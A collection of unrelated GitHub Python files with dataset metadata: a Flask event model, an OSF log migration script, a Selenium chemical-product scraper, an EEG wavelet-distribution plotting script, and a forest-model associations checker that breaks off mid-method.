one_message.creator = user.User.get_from_id(
{"id": row["messages.user_id"]}) # grabbing events user_id
event.messages.append(one_message)
return event
@classmethod # upate function
def update(cls, data):
query = """UPDATE events
SET event= %(event)s,
description= %(description)s,
activities= %(activities)s,
start_date= %(start_date)s,
end_date= %(end_date)s,
location= %(location)s,
updated_at= NOW()
WHERE id= %(id)s;"""
return connectToMySQL(cls.db).query_db(query, data)
@classmethod # delete function
def destroy(cls, data):
query = """DELETE FROM events
WHERE id = %(id)s;"""
return connectToMySQL(cls.db).query_db(query, data)
@staticmethod # validating event details
def validate_event(event):
is_valid = True
if len(event['event']) < 2:
is_valid = False
flash("The event name is too short", "event")
if len(event['activities']) < 2:
is_valid = False
flash("The activities is too short", "event")
if len(event['description']) < 2:
is_valid = False
flash("The description is too short", "event")
if len(event['start_date']) == "":
is_valid = False
flash("missing a date", "event")
if len(event['end_date']) == "":
is_valid = False
flash("missing a date", "event")
if len(event['location']) < 2:
is_valid = False
flash("Location is too short", "event")
return is_valid
| rchuu/plannendar | flask_app/models/event.py | event.py | py | 5,351 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "flask_app.config.mysqlconnection.connectToMySQL",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "flask_app.config.mysqlconnection.connectToMySQL",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "flask_app.config.mysqlconnection.connectToMySQL",... |
12410410025 | """
Update existing "embargo_approved_no_user" logs to link to registered project instead
of the registration.
"""
from copy import deepcopy
import logging
import sys
from modularodm import Q
from framework.transactions.context import TokuTransaction
from website.models import Node, NodeLog
from website.app import init_app
from scripts import utils as script_utils
logger = logging.getLogger(__name__)
def main():
targets = get_targets()
fix_embargo_approved_logs(targets)
def get_targets():
return NodeLog.find(Q('action', 'eq', NodeLog.EMBARGO_APPROVED) & Q('params.user', 'eq', None))
def fix_embargo_approved_logs(targets):
count = 0
for log in targets:
node_id = log.params['node']
node = Node.load(node_id)
if node.is_registration:
original_params = deepcopy(log.params)
log.params['node'] = node.registered_from_id
log.params['registration'] = node._id
logger.info('Updating params of log {} from {} to {}'.format(log._id, original_params, log.params))
log.save()
count += 1
logger.info('{} logs migrated'.format(count))
if __name__ == '__main__':
dry = '--dry' in sys.argv
if not dry:
script_utils.add_file_logger(logger, __file__)
init_app(routes=False, set_backends=True)
with TokuTransaction():
main()
if dry:
raise Exception('Dry Run -- Aborting Transaction')
| karenhanson/osf.io_rmap_integration_old | scripts/fix_embargo_approved_logs.py | fix_embargo_approved_logs.py | py | 1,458 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "logging.getLogger",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "website.models.NodeLog.find",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "website.models.NodeLog",
"line_number": 26,
"usage_type": "name"
},
{
"api_name": "... |
35217860162 | from itertools import product
import sys
from bs4 import BeautifulSoup
from selenium import webdriver
import time
import json
import random
sys.path.append('../..')
from lib import excelUtils
from lib import httpUtils
from lib import textUtil
from lib.htmlEleUtils import getNodeText
from lib.htmlEleUtils import getInnerHtml
products = []
header=['link','type','Product Name']
def addHeader(title):
if title not in header and len(title) > 0:
header.append(title)
chrome_options = webdriver.ChromeOptions()
# chrome_options.add_argument('--headless')
chrome_options.add_argument('--disable-gpu')
chrome_options.add_argument("window-size=1024,768")
chrome_options.add_argument("--proxy-server=http://127.0.0.1:33210")
# chrome_options.add_argument("--no-sandbox")
browser = webdriver.Chrome(chrome_options=chrome_options)
def getProductInfo(url):
print(str(len(products)) + ":" + url)
browser.get(url)
sope= BeautifulSoup(browser.page_source, "html.parser")
pInfo = {
"link": url,
}
nameArea = sope.find("div", attrs={"class":"col-lg-12 col-md-12 col-sm-12 col-xs-12 follow-box-title"})
pInfo["Product Name"] = getNodeText(nameArea)
specs = sope.find_all("div", attrs={"class":"prd-des-lis"})
for spec in specs:
titleArea = spec.find("div", attrs={"class":"col-lg-4 col-md-4 col-sm-12 col-xs-12 prod-categorty"})
valArea = spec.find("div", attrs={"class":"col-lg-8 col-md-8 col-sm-12 col-xs-12 clearfix prod-categorty prod-category-back"})
valArea2 = spec.find("div", attrs={"class":"col-lg-8 col-md-8 col-sm-12 col-xs-12 clearfix prod-categorty prod-category-back synonymWrapper"})
if titleArea!=None:
title = getNodeText(titleArea)
value = getNodeText(valArea)
if len(value) == 0:
value = getNodeText(valArea2)
addHeader(title)
pInfo[title] = value
print(pInfo)
products.append(pInfo.copy())
def getProductType(url):
browser.get(url)
sope= BeautifulSoup(browser.page_source, "html.parser")
trs = sope.find_all("div", attrs={"class":"single-details"})
for tr in trs:
pLink = tr.find("a")
if pLink != None:
linkSrc = pLink["href"]
getProductInfo(linkSrc)
# getProductInfo("https://www.lobachemie.com/Alcohols-0059A/tertBUTANOL-CASNO-75-65-0.aspx", 'Alcohols')
for pIndex in range(1, 7):
getProductType("https://www.parchem.com/Solvents-chemicals-supplier-distributor~"+str(pIndex)+".aspx")
# getProductType("https://www.parchem.com/Solvents-chemicals-supplier-distributor~1.aspx")
excelUtils.generateExcel('parchem.xlsx', products, header) | Just-Doing/python-caiji | src/work/20230205/parchem.py | parchem.py | py | 2,568 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "sys.path.append",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "sys.path",
"line_number": 9,
"usage_type": "attribute"
},
{
"api_name": "selenium.webdriver.ChromeOptions",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "selenium... |
7416408824 | import pywt
import numpy as np
from scipy import stats
import matplotlib.pyplot as plt
plt.style.use("resources/figstyle.mplstyle")
FIG_WIDTH = 2.3 * 7.16
# Gaussian fitting utils
from scipy import optimize
def fit_generalized_gaussian(x):
μ0 = x.mean()
σ0 = x.std()
β0 = 2
res = optimize.minimize(
neg_gg_likelihood,
(μ0, σ0, β0),
args=(x,),
bounds=[(-np.inf, np.inf), (1e-2, np.inf), (1e-2, np.inf)],
)
return res.x
def neg_gg_likelihood(θ, x):
μ, σ, β = θ
return -stats.gennorm.logpdf(x, loc=μ, scale=σ, beta=β).sum()
# Load data and normalize
eeg = np.load("resources/data/eeg-denoise-net/EEG_all_epochs.npy")
eog = np.load("resources/data/eeg-denoise-net/EOG_all_epochs.npy")
emg = np.load("resources/data/eeg-denoise-net/EMG_all_epochs.npy")
n_eeg = (eeg - eeg.mean(axis=-1).reshape(-1, 1)) / eeg.std(axis=-1).reshape(-1, 1)
n_eog = (eog - eog.mean(axis=-1).reshape(-1, 1)) / eog.std(axis=-1).reshape(-1, 1)
n_emg = (emg - emg.mean(axis=-1).reshape(-1, 1)) / emg.std(axis=-1).reshape(-1, 1)
# Wavelet transform
max_levels = 4
eeg_coeffs = pywt.wavedec(
n_eeg, "sym5", level=max_levels, axis=-1, mode="periodization"
)
eog_coeffs = pywt.wavedec(
n_eog, "sym5", level=max_levels, axis=-1, mode="periodization"
)
emg_coeffs = pywt.wavedec(
n_emg, "sym5", level=max_levels, axis=-1, mode="periodization"
)
level_names = [f"Level $c_{n}$" for n in range(len(eeg_coeffs), 0, -1)]
# Prepare figure
num_levels = 4
xlim = (-8, 8)
fig, axes = plt.subplots(
nrows=num_levels,
sharex=True,
ncols=3,
figsize=(FIG_WIDTH, FIG_WIDTH * 0.3),
)
num_bins = 201
bin_range = (-10, 10)
n = 0
for cs_eeg, cs_eog, cs_emg, name in zip(
eeg_coeffs[:num_levels],
eog_coeffs[:num_levels],
emg_coeffs[:num_levels],
level_names[:num_levels],
):
_, bins, _ = axes[n, 0].hist(
cs_eeg.reshape(-1),
fc="#2D9CDB",
bins=num_bins,
range=bin_range,
density=True,
alpha=0.7,
)
μ, α, β = fit_generalized_gaussian(cs_eeg.reshape(-1))
axes[n, 0].plot(
bins,
stats.gennorm.pdf(bins, loc=μ, scale=α, beta=β),
c="k",
ls="--",
lw=1.5,
label=f"α = {α:.2f}\nβ = {β:.2f}",
)
axes[n, 0].legend(loc="upper right", bbox_to_anchor=(1.03, 1.1))
if n == 0:
μ, α, β = fit_generalized_gaussian(cs_eog.reshape(-1))
axes[n, 1].plot(
bins,
stats.gennorm.pdf(bins, loc=μ, scale=α, beta=β),
c="k",
ls="--",
lw=1,
alpha=0.8,
label=f"α = {α:.2f}\nβ = {β:.2f}",
)
axes[n, 1].legend(loc="upper right", bbox_to_anchor=(1.03, 1.1))
μ, α, β = fit_generalized_gaussian(cs_emg.reshape(-1))
axes[n, 2].plot(
bins,
stats.gennorm.pdf(bins, loc=μ, scale=α, beta=β),
c="k",
ls="--",
lw=1,
alpha=0.8 if n == 2 else 1,
label=f"α = {α:.2f}\nβ = {β:.2f}",
)
axes[n, 2].legend(loc="upper right", bbox_to_anchor=(1.03, 1.1))
axes[n, 2].hist(
cs_emg.reshape(-1),
fc="#2D9CDB",
bins=num_bins,
range=bin_range,
density=True,
alpha=0.7,
)
axes[n, 1].hist(
cs_eog.reshape(-1),
fc="#2D9CDB",
bins=num_bins,
range=bin_range,
density=True,
alpha=0.7,
)
axes[n, 0].set_ylabel(name)
axes[n, 0].set_yticks([])
axes[n, 1].set_yticks([])
axes[n, 2].set_yticks([])
n += 1
axes[0, 0].set_title("EEG", fontsize=14)
axes[0, 1].set_title("EOG", fontsize=14)
axes[0, 2].set_title("EMG", fontsize=14)
axes[0, 0].set_xticks([-5, 0, 5])
axes[0, 1].set_xticks([-5, 0, 5])
axes[0, 2].set_xticks([-5, 0, 5])
axes[0, 0].set_xlim(*xlim)
axes[0, 1].set_xlim(*xlim)
axes[0, 2].set_xlim(*xlim)
axes[-1, 0].set_xlabel("Coefficient value", labelpad=-2)
axes[-1, 1].set_xlabel("Coefficient value", labelpad=-2)
axes[-1, 2].set_xlabel("Coefficient value", labelpad=-2)
fig.subplots_adjust(wspace=0.04, hspace=0.1)
fig.savefig("./output/acha_fig2_coeff_distributions.pdf")
print("Figure saved to `./output/acha_fig2_coeff_distributions.pdf`")
| mattbit/wavelet-wqn-acha | acha_scripts/02_figure_2__coeff_distributions.py | 02_figure_2__coeff_distributions.py | py | 4,260 | python | en | code | 2 | github-code | 36 | [
{
"api_name": "matplotlib.pyplot.style.use",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.style",
"line_number": 7,
"usage_type": "attribute"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 7,
"usage_type": "name"
},
{
"api_name"... |
10246834959 | import os
import argparse
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Some hyperparameters')
parser.add_argument('--epochs', type=int, default=200)
parser.add_argument('--frac', type=float, default=0.1)
parser.add_argument('--iid', type=bool, default=False)
parser.add_argument('--dataset', type=str, default='fashion-mnist')
parser.add_argument('--model', type=str, default='cnn')
args = parser.parse_args()
rootpath = './log'
# full participation
full_acc = []
full_accfile = open(rootpath + '/accfile_fed_{}_{}_{}_C{}_iid{}_{}.dat'.
format(args.dataset, args.model, args.epochs, 1.0, args.iid, 'full'), 'r')
for acc in full_accfile.readlines():
full_acc.append(float(acc))
full_accfile.close()
# random sampling
rand_acc = []
rand_accfile = open(rootpath + '/accfile_fed_{}_{}_{}_C{}_iid{}_{}.dat'.
format(args.dataset, args.model, args.epochs, args.frac, args.iid, 'full'), 'r')
for acc in rand_accfile.readlines():
rand_acc.append(float(acc))
rand_accfile.close()
# power-of-choice
power_acc = []
power_accfile = open(rootpath + '/accfile_fed_{}_{}_{}_C{}_iid{}_{}.dat'.
format(args.dataset, args.model, args.epochs, 1.0, args.iid, 'power-of-choice'), 'r')
for acc in power_accfile.readlines():
power_acc.append(float(acc))
power_accfile.close()
# ideal
ideal_acc = []
ideal_accfile = open(rootpath + '/accfile_fed_{}_{}_{}_C{}_iid{}_{}.dat'.
format(args.dataset, args.model, args.epochs, 0.3, args.iid, 'ideal'), 'r')
for acc in ideal_accfile.readlines():
ideal_acc.append(float(acc))
ideal_accfile.close()
# # practical
# practical_acc = []
# prac_accfile = open(rootpath + '/accfile_fed_{}_{}_{}_C{}_iid{}_{}.dat'.
# format(args.dataset, args.model, args.epochs, 1.0, args.iid, 'practical'), 'r')
# for acc in prac_accfile.readlines():
# practical_acc.append(float(acc))
# prac_accfile.close()
# # divfl
# divfl_acc = []
# divfl_accfile = open(rootpath + '/accfile_fed_{}_{}_{}_C{}_iid{}_{}.dat'.
# format(args.dataset, args.model, args.epochs, 1.0, args.iid, 'divfl'), 'r')
# for acc in divfl_accfile.readlines():
# divfl_acc.append(float(acc))
# divfl_accfile.close()
plt.figure()
plt.plot(range(len(full_acc)), full_acc, linestyle='--', label='Full')
plt.plot(range(len(rand_acc)), rand_acc, label='Random')
plt.plot(range(len(power_acc)), power_acc, label='Power-of-choice')
# plt.plot(range(len(divfl_acc)), divfl_acc, label='DivFL')
plt.plot(range(len(ideal_acc)), ideal_acc, label='Ours (ideal)')
# plt.plot(range(len(practical_acc)), practical_acc, label='Ours (practical)')
plt.legend()
plt.xlabel('Epoch')
plt.ylabel('Test Accuracy')
plt.savefig(rootpath + '/fed_{}_{}_{}_iid{}_acc.png'.format(args.dataset, args.model, args.epochs, args.iid)) | jinwoolim8180/fl-sparse-masking | accuracy.py | accuracy.py | py | 3,163 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "matplotlib.use",
"line_number": 4,
"usage_type": "call"
},
{
"api_name": "argparse.ArgumentParser",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.figure",
"line_number": 67,
"usage_type": "call"
},
{
"api_name": "matplot... |
19074906476 | from collections import Iterator, Iterable
#global set_num
#set_num = 0
class Disjoint_set(Iterable):
def __init__(self, element=None):
self.head = element
self.tail = element
element.set = self
#global set_num
#set_num += 1
def add_element(self, element):
if self.head != None:
self.tail.next = element
else:
self.head = element
self.tail = element
element.set = self
def __str__(self):
if not self.is_empty():
return str([self.head.label, self.tail.label])
else:
return 'empty set'
def get_elements(self):
if not self.is_empty():
elements_ls = [self.head.label]
ele = self.head
while ele.next:
elements_ls.append(ele.next.label)
ele = ele.next
return elements_ls
else:
return []
def get_len(self):
if not self.is_empty():
set_len = 1
ele = self.head
while ele.next:
set_len+=1
ele = ele.next
return set_len
else:
return 0
def is_empty(self):
return self.head == None
def __iter__(self):
if not self.head:
return
ele = self.head
yield ele
while ele.next:
ele = ele.next
yield ele
class Element():
def __init__ (self, label):
self.set = None
self.next = False
self.label = label
def show_set(self):
return(self.set.get_elements())
def __str__(self):
return str(self.label)
def union(set1, set2):
if set1.get_len() > set2.get_len():
max_set = set1
min_set = set2
else:
min_set = set1
max_set = set2
max_set.tail.next = min_set.head
max_set.tail = min_set.tail
#min_set.tail.next = None
cur = min_set.head
cur.set = max_set
while cur.next:
cur = cur.next
cur.set = max_set
min_set.head = None
min_set.tail = False
#global set_num
#set_num -= 1
return max_set
| LouisYLWang/Algorithms | Clustering_algorithm/Disjoint_set.py | Disjoint_set.py | py | 2,199 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "collections.Iterable",
"line_number": 7,
"usage_type": "name"
}
] |
39804183733 | import os
from celery import Celery
# Set the default Django settings module for the 'celery' program.
# similar to the setup in asgi.py
# os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'prolube76site.settings')
app = Celery('prolube76site')
# Using a string here means the worker doesn't have to serialize
# the configuration object to child processes.
# - namespace='CELERY' means all celery-related configuration keys
# should have a `CELERY_` prefix.
# We also add the Django settings module as a configuration source for Celery. This means that you don’t have to use multiple configuration files, and instead configure Celery directly from the Django settings;
# but you can also separate them if wanted.
app.config_from_object('django.conf:settings', namespace='CELERY')
# Load task modules from all registered Django apps.
app.autodiscover_tasks()
@app.task(bind=True)
def debug_task(self):
print(f'Request: {self.request!r}')
| zjgcainiao/new_place_at_76 | prolube76site/celery.py | celery.py | py | 952 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "celery.Celery",
"line_number": 9,
"usage_type": "call"
}
] |
31566863140 | import sys
import csv
# preprocessing
import gensim
from gensim.utils import simple_preprocess
import re
import nltk
from nltk.corpus import stopwords
from nltk.tokenize import word_tokenize
# lemmitization
from nltk.stem import WordNetLemmatizer
def pre_processor():
user_input = input('Please enter a dream: ')
data = user_input
# remove punctuatiom
data = re.sub(r'[^\w\s]', '', data)
# lower case
data = data.lower()
# remove numbers
data = re.sub(r'\d+', '', data)
# remove newlines '/n'
data = re.sub('\s+', ' ', data)
# remove non-ASCII characters
data = re.sub(r'[^\x00-\x7f]',r' ',data)
# remove underscores
data = re.sub(r'[_]', '', data)
# remove words less than 3 characters
data = re.sub(r'\b\w{1,2}\b', '', data)
# create stop_words
stop_words = stopwords.words('english')
new_stop_words = ['from', 'subject', 're', 'edu', 'use', 'not', 'would', 'say', 'could', '_', 'be', 'know',
'good', 'go', 'get', 'do', 'done', 'try', 'many', 'some', 'nice', 'thank', 'think', 'see',
'rather', 'easy', 'easily', 'lot', 'lack', 'make', 'want', 'seem', 'run', 'need', 'even',
'right', 'line', 'even', 'also', 'may', 'take', 'come', 'look', 'back', 'start', 'going',
'doing', 'what','whats', 'pron', 'dream', 'and']
stop_words.extend(new_stop_words)
# remove stop words and tokenize
data_words = [i for i in word_tokenize(data.lower()) if i not in stop_words]
# create bigrams
bigram = gensim.models.Phrases(data_words, min_count=5, threshold=100)
bigram_mod = gensim.models.phrases.Phraser(bigram)
data_words_bigrams = bigram_mod[data_words]
# Init the Wordnet Lemmatizer
lemmatizer = WordNetLemmatizer()
data_lemmatized = [lemmatizer.lemmatize(w) for w in data_words_bigrams]
return data_lemmatized
| connormeaton/dream_cluster | src/app/SampleTextPreprocessor.py | SampleTextPreprocessor.py | py | 1,906 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "re.sub",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "re.sub",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "re.sub",
"line_number": 27,
"usage_type": "call"
},
{
"api_name": "re.sub",
"line_number": 29,
"usage_type"... |
12185526029 | """Inference for 2D US Echocardiography EchoNet dataset."""
import os
import numpy as np
import torch
import torchvision.transforms as transforms
import torch.nn.functional as F
from PIL import Image
from torch.autograd import Variable
import matplotlib.pyplot as plt
from models.unet import UNet
from models.cenet import CE_Net_OCT
from models.fpn import FPN
import glob
class TTTSInference:
"""EchoCardioInference class."""
def __init__(self, model_path: str = None
) -> None:
"""
Args:
model_path:
"""
self.model_path = model_path
self.model = FPN(num_blocks=[2,4,23,3], num_classes=4, back_bone="resnet101")
self.model.load_state_dict(torch.load(self.model_path,
map_location="cpu"))
self.model.eval()
self.transforms = transforms.Compose([
transforms.Resize(size=(448, 448)),
transforms.ToTensor()
])
def get_visual_prediction(self,
image_name,
mask_name):
"""
Args:
image_name:
mask_name:
Returns:
"""
image = Image.open(image_name)
mask = Image.open(mask_name)
size = (448, 448)
img = self.transforms(image).unsqueeze(0)
mask = self.transforms(mask).unsqueeze(0)
pred_mask = self.model(Variable(img))
pred_mask = F.softmax(pred_mask, dim=1)
pred_mask = pred_mask.squeeze(0)
data = pred_mask.cpu().data
full_mask = torch.argmax(data, 0)
plt.imshow(full_mask[:, :])
#pred_mask = transforms.ToPILImage()(data).resize(size)
#data_mask = mask.squeeze(0).cpu().data
#mask = transforms.ToPILImage()(data_mask)
#ig = plt.imshow(pred_mask)
#ii = plt.imshow(mask.squeeze(0).squeeze(0), alpha=0.4)
plt.show()
if __name__ == "__main__":
fet_reg = TTTSInference(model_path="../data/model-fold-0fpa.pt")
fet_reg.get_visual_prediction(image_name="../data/Video001/images/Video001_frame01250.png",
mask_name="../data/Video001/labels/Video001_frame01250.png") | SanoScience/TTTS_CV | src/inference.py | inference.py | py | 2,235 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "models.fpn.FPN",
"line_number": 27,
"usage_type": "call"
},
{
"api_name": "torch.load",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "torchvision.transforms.Compose",
"line_number": 32,
"usage_type": "call"
},
{
"api_name": "torchvision.... |
69997777065 | from re import split
from typing import Dict, Mapping
from elasticsearch import Elasticsearch
import cbor
import json
from trec_car.read_data import *
class IndexManagement:
def __init__(self):
self.es_cli = Elasticsearch(
timeout=200, max_retries=15, retry_on_timeout=True)
self.es_cli.info()
# use default setting
self.setting = {
"settings": {
"number_of_shards": 5,
"index": {
"similarity": {
"default": {
"type": "BM25",
"b": 0.75,
"k1": 1.2,
}
}
}
}
}
def index_text_data(self, index_name: str, filepath: str) -> None:
""" Indexes data into the elastics search instance.
Args:
index_name: Name of index.
doc_id: Id of the document to be indexed.
doc: Document to be indexed.
"""
batch_size = 5000
f = open(filepath, 'r', encoding='utf-8')
lines = f.readlines()
for i in range(0, len(lines), batch_size):
bulk_data = []
for line in lines[i:i+batch_size]:
doc = line.split('\t')
curr_doc = {"doc_id": doc[0], "body": doc[1].strip()}
json_doc = json.dumps(curr_doc)
_doc = json.loads(json_doc)
bulk_data.append(
{"index": {"_index": index_name,
"_id": _doc.pop("doc_id")}}
)
bulk_data.append(_doc)
self.es_cli.bulk(index=index_name, body=bulk_data, refresh=True)
def index_cbor_data(self, index_name: str, filepath: str) -> None:
"""[summary]
Args:
index_name (str): [description]
filepath (str): [description]
"""
batch_size = 5000
bulk_data = []
with open(filepath, 'rb') as fp:
for i, para in enumerate(iter_paragraphs(fp)):
para_id = para.para_id
body = [elem.text if isinstance(elem, ParaText)
else elem.anchor_text
for elem in para.bodies]
body = ' '.join(body)
elem = {"doc_id": para_id, "body": body.strip()}
json_elem = json.dumps(elem)
_elem = json.loads(json_elem)
bulk_data.append(
{"index": {"_index": index_name,
"_id": _elem.pop("doc_id")}}
)
bulk_data.append(_elem)
if (i+1) % batch_size == 0:
self.es_cli.bulk(index=index_name,
body=bulk_data, refresh=True)
bulk_data = []
if len(bulk_data) > 0:
self.es_cli.bulk(index=index_name,
body=bulk_data, refresh=True)
def reset_index(self, index_name: str) -> None:
""" Removes instance of elastics search.
Args:
index_name: Name of index.
index_setting: Index setting chosen for the elastics search instance.
"""
if self.es_cli.indices.exists(index_name):
self.es_cli.indices.delete(index=index_name)
# self.es_cli.create(index=index_name)
if __name__ == "__main__":
""" filepath_marco = "D:\data_collection/collection.tsv"
filepath_car = "../data_collection/dedup.articles-paragraphs.cbor"
index_name = 'ms_marco'
index_mng = IndexManagement()
index_mng.reset_index(index_name)
index_mng.index_text_data(index_name, filepath_marco)
index_mng.index_cbor_data(index_name, filepath_car) """
es = Elasticsearch()
print(es.count(index="ms_marco"))
| Hanifff/ConversationalAssistance | index_data.py | index_data.py | py | 3,917 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "elasticsearch.Elasticsearch",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "json.dumps",
"line_number": 46,
"usage_type": "call"
},
{
"api_name": "json.loads",
"line_number": 47,
"usage_type": "call"
},
{
"api_name": "json.dumps",
"l... |
19348729652 | from app import app
from flask import request, jsonify, make_response
from api_exception import ApiException
from data.internal_configurations.internal_configurations import InternalConfigurations
@app.errorhandler(ApiException)
def handle_invalid_service(error):
response = jsonify(error.to_dict())
response.status_code = error.status_code
return response
@app.route('/api/internal-configurations', methods=['GET', 'POST', 'PUT'])
def internal_configurations():
query_params = request.args
if request.method == "GET":
internal_configs = InternalConfigurations()
if query_params.get("feature"):
return jsonify(internal_configs.find_by("feature", query_params.get("feature"))), 200
else:
return jsonify(internal_configs.all), 200
elif request.method == "POST":
internal_configs = InternalConfigurations(params=request.get_json())
if internal_configs.save:
return jsonify({"message": "Internal Configuration created."}), 200
else:
return jsonify({"message": "Internal Configuration not created."}), 400
elif request.method == "PUT":
if not query_params.get("feature"):
return jsonify({"missing query `feature`."}), 400
internal_configs = InternalConfigurations(
feature=query_params.get("feature"))
if internal_configs.exists:
try:
if internal_configs.update(request.get_json()):
return jsonify({"message": "Succssefuly upated."}), 200
else:
return jsonify({"message": "Something went wrong while upating."}), 200
except Exception as e:
raise ApiException(e.message, 500)
else:
return jsonify({"message": "`{}`feature not found.".format(query_params.get("feature"))}), 404
| mbast100/st-joseph-backend-services | routes/internal_configurations.py | internal_configurations.py | py | 1,885 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "flask.jsonify",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "app.app.errorhandler",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "api_exception.ApiException",
"line_number": 7,
"usage_type": "argument"
},
{
"api_name": "app.ap... |
35609489128 | from math import sqrt
import torch
from torch import nn
class FSRCNN(nn.Module):
"""
Args:
upscale_factor (int): Image magnification factor.
"""
def __init__(self, upscale_factor: int) -> None:
super(FSRCNN, self).__init__()
# Feature extraction layer.
self.feature_extraction = nn.Sequential(
nn.Conv2d(1, 56, (5, 5), (1, 1), (2, 2)),
nn.PReLU(56)
)
# Shrinking layer.
self.shrink = nn.Sequential(
nn.Conv2d(56, 12, (1, 1), (1, 1), (0, 0)),
nn.PReLU(12)
)
# Mapping layer.
self.map = nn.Sequential(
nn.Conv2d(12, 12, (3, 3), (1, 1), (1, 1)),
nn.PReLU(12),
nn.Conv2d(12, 12, (3, 3), (1, 1), (1, 1)),
nn.PReLU(12),
nn.Conv2d(12, 12, (3, 3), (1, 1), (1, 1)),
nn.PReLU(12),
nn.Conv2d(12, 12, (3, 3), (1, 1), (1, 1)),
nn.PReLU(12)
)
# Expanding layer.
self.expand = nn.Sequential(
nn.Conv2d(12, 56, (1, 1), (1, 1), (0, 0)),
nn.PReLU(56)
)
# Deconvolution layer.
self.deconv = nn.ConvTranspose2d(56, 1, (9, 9), (upscale_factor, upscale_factor), (4, 4), (upscale_factor - 1, upscale_factor - 1))
# Initialize model weights.
self._initialize_weights()
def forward(self, x: torch.Tensor) -> torch.Tensor:
return self._forward_impl(x)
# Support torch.script function.
def _forward_impl(self, x: torch.Tensor) -> torch.Tensor:
out = self.feature_extraction(x)
out = self.shrink(out)
out = self.map(out)
out = self.expand(out)
out = self.deconv(out)
return out
# The filter weight of each layer is a Gaussian distribution with zero mean and standard deviation initialized by random extraction 0.001 (deviation is 0).
def _initialize_weights(self) -> None:
for m in self.modules():
if isinstance(m, nn.Conv2d):
nn.init.normal_(m.weight.data, mean=0.0, std=sqrt(2 / (m.out_channels * m.weight.data[0][0].numel())))
nn.init.zeros_(m.bias.data)
nn.init.normal_(self.deconv.weight.data, mean=0.0, std=0.001)
nn.init.zeros_(self.deconv.bias.data) | gmlwns2000/sharkshark-4k | src/upscale/model/fsrcnn/model.py | model.py | py | 2,315 | python | en | code | 14 | github-code | 36 | [
{
"api_name": "torch.nn.Module",
"line_number": 6,
"usage_type": "attribute"
},
{
"api_name": "torch.nn",
"line_number": 6,
"usage_type": "name"
},
{
"api_name": "torch.nn.Sequential",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"line_... |
33532112483 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
A script to test if the associations.csv are good.
Typically you would run this file from a command line like this:
ipython3.exe -i -- /deploy/cbmcfs3_runner/scripts/check_associations.py
"""
# Built-in modules #
# Third party modules #
import pandas
from tqdm import tqdm
# First party modules #
from autopaths.auto_paths import AutoPaths
from plumbing.cache import property_cached
from plumbing.databases.access_database import AccessDatabase
# Internal modules #
from cbmcfs3_runner.core.continent import continent
# Constants #
###############################################################################
class AssociationsChecker(object):
keys = ['MapAdminBoundary', 'MapEcoBoundary', 'MapSpecies',
'MapDisturbanceType', 'MapNonForestType']
all_paths = """
/orig/calibration.mdb
/orig/aidb_eu.mdb
/orig/associations.csv
"""
def __init__(self, country):
# Default attributes #
self.country = country
# Automatically access paths based on a string of many subpaths #
self.paths = AutoPaths(self.country.data_dir, self.all_paths)
@property_cached
def aidb(self):
"""Shortcut to the AIDB."""
database = AccessDatabase(self.paths.aidb_eu_mdb)
database.convert_col_names_to_snake = True
return database
@property_cached
def calib(self):
"""Shortcut to the Calibration DB."""
database = AccessDatabase(self.paths.calibration_mdb)
database.convert_col_names_to_snake = True
return database
@property_cached
def df(self):
"""Load the CSV that is 'associations.csv'."""
self.paths.associations.must_exist()
return pandas.read_csv(str(self.paths.associations))
def key_to_rows(self, mapping_name):
"""
Here is an example call:
>>> self.key_to_rows('MapDisturbanceType')
{'10% commercial thinning': '10% Commercial thinning',
'Deforestation': 'Deforestation',
'Fire': 'Wild Fire',
'Generic 15%': 'generic 15% mortality',
'Generic 20%': 'generic 20% mortality',
'Generic 30%': 'generic 30% mortality',
'Spruce Beetle 2% mortality (Ice sleet)': 'Spruce Beetle 2% mortality'}
"""
query = "A == '%s'" % mapping_name
mapping = self.df.query(query).set_index('B')['C'].to_dict()
return mapping
def list_missing(self):
"""
A method to predict what errors the Standard Import Tool will throw
in advance, by checking the contents of the AIDB.
"""
# Print function #
def print_messages(default, names, key):
template = "%s - %s - '%s' missing from archive index database."
for name in names:
if name not in default:
print(template % (key, self.parent.parent.country_iso2, name))
# Admin boundaries #
default = set(self.aidb['tblAdminBoundaryDefault']['AdminBoundaryName'])
names = self.key_to_rows(self.keys[0]).values()
print_messages(default, names, self.keys[0])
# Eco boundaries #
default = set(self.aidb['tblEcoBoundaryDefault']['EcoBoundaryName'])
names = self.key_to_rows(self.keys[1]).values()
print_messages(default, names, self.keys[1])
# Species #
default = set(self.aidb['tblSpeciesTypeDefault']['SpeciesTypeName'])
names = self.key_to_rows(self.keys[2]).values()
print_messages(default, names, self.keys[2])
# Disturbances #
default = set(self.aidb['tblDisturbanceTypeDefault']['dist_type_name'])
names = self.key_to_rows(self.keys[3]).values()
print_messages(default, names, self.keys[3])
# Disturbances also have to match with disturbance_types.csv #
types = set(self.country.parent.csv_to_xls.read_csv('disturbance_types')['dist_desc_input'])
names = set(self.key_to_rows(self.keys[3]).keys())
